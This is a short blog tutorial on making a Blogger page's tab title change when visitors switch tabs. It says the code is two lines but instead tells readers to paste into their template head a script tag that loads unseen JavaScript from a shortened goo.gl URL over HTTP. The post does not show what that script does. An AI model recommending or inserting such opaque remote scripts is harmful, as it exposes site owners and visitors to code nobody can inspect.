How to change the Page (tab) title when user loses focus
Recently I have been searching for some resources for my new app so suddenly I passed through a website that would change its title when the user leaves the tab and goes to an another tab so I was thinking why not show you guys how to do this little trick to impress your visitors. It is really a short java script consisting of two lines of code only.
NOW!
Step 1: Login to Blogger Dashboard, then choose Template -> Edit Html.
Step 2: Press Ctrl + F and search for the following keywords: <head> very simple, just copy and paste the code below <head>.
<script src='http://goo.gl/pn34hW' type='text/javascript'></script>
Note: Please give credit when sharing this code or post.
0 comments: